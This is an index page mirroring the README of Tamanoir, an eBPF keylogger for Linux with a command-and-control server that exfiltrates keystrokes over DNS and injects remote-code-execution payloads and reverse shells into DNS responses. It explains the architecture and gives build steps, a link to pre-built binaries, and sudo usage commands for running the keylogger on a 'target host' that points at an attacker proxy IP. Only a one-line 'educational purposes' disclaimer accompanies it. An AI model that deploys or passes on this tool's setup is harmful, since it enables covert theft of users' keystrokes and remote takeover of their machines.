Data

Tools

Indexes

Applications

Experiments

Awesome

An open API service indexing awesome lists of open source software.

https://github.com/adgaultier/tamanoir

An eBPF🐝 Keylogger with C2-based RCE payload delivery
https://github.com/adgaultier/tamanoir

aya ebpf hacking keylogger linux ratatui rust security tonic

Last synced: about 1 month ago
JSON representation

An eBPF🐝 Keylogger with C2-based RCE payload delivery

Awesome Lists containing this project

README 

        


  
Tamanoir


  
An eBPF🐝 Keylogger with 
C2-based RCE payload delivery


  

  
A large anteater of Central and South America, Myrmecophaga tridactyla





## 💡Overview



Tamanoir is structured around 3 components: 



### 1. Tamanoir

An eBPF program running on a target host, it will act as a keylogger and extract keystrokes via DNS queries.
 

In DNS response, attacker can choose to send chunks of RCE payload that will be executed on targeted host.



### 2. Tamanoir-C2

The Command & Control server. It acts as a DNS proxy and can inject rce payloads in DNS response.
 

It also can handle reverse shell connections.



### 3. Tamanoir-tui

The TUI client communicating with C2 server. Built on top of ratatui





  

  
Tui client demo





#### ⚡ Powered by [Aya](https://aya-rs.dev), [Tokio](https://github.com/tokio-rs/tokio),  [Tonic](https://github.com/hyperium/tonic) and [Ratatui](https://ratatui.rs)



### Glossary

- what is [eBPF](https://ebpf.io/what-is-ebpf/)

- C2: Command and Control

- RCE: Remote Code Execution



### Documentation

Jump to:

- [Focus on Tamanoir (eBPF)](assets/doc/tamanoir.md)

- [Focus on Tamanoir-C2](assets/doc/tamanoir-c2.md)

- [Focus on Tamanoir-Tui  ](assets/doc/tamanoir-tui.md)





## Architecture



  




## 🚀 Setup



You need a Linux based OS.



### ⚒️ Build from source



To build from source, make sure you have:



- [bpf-linker](https://github.com/aya-rs/bpf-linker) installed.

- [Rust](https://www.rust-lang.org/tools/install) installed with `nightly` toolchain.

- protobuf-compiler



#### 1. Build ebpf program



```

cd tamanoir-ebpf && cargo build --release

```



#### 2. Build user space program



```

cargo build -p tamanoir --release

```



#### 3. Build C2 Server



```

cargo build -p tamanoir-c2 --release

```



#### 4. Build Ratatui Client



```

cargo build -p tamanoir-tui --release

```



These commands will produce  `tamanoir`, `tamanoir-c2` and `tamanoir-tui` executables  in `target/release` that you can add to your`$PATH`



### 📥 Binary release



You can download the pre-built binaries from the [release page](https://github.com/adgaultier/tamanoir/releases)







## 🪄 Usage



### Tamanoir

🖥️ on target host:

```

RUST_LOG=info sudo -E tamanoir \

              --proxy-ip  \

              --hijack-ip  \

              --iface 

```



for example:



```

RUST_LOG=info sudo -E tamanoir \

              --proxy-ip 192.168.1.15 \

              --hijack-ip 8.8.8.8 \

              --iface wlan0

```







### C2 Server

🖥️ on your C2 server host:



```

sudo tamanoir-c2 start

```

> [!NOTE]

> Make sure port 53 is available







### Tui Client

🖥️ wherever you want to use the client:



```

tamanoir-tui -i   

```

> [!NOTE]

> Make sure C2 server is reachable on port 50051







## ⚠️ Disclaimer



`Tamanoir` is developed for educational purposes only







## ✍️ Authors



[Adrien Gaultier](https://github.com/adgaultier)

[Badr Badri](https://github.com/pythops)







## ⚖️ License



GPLv3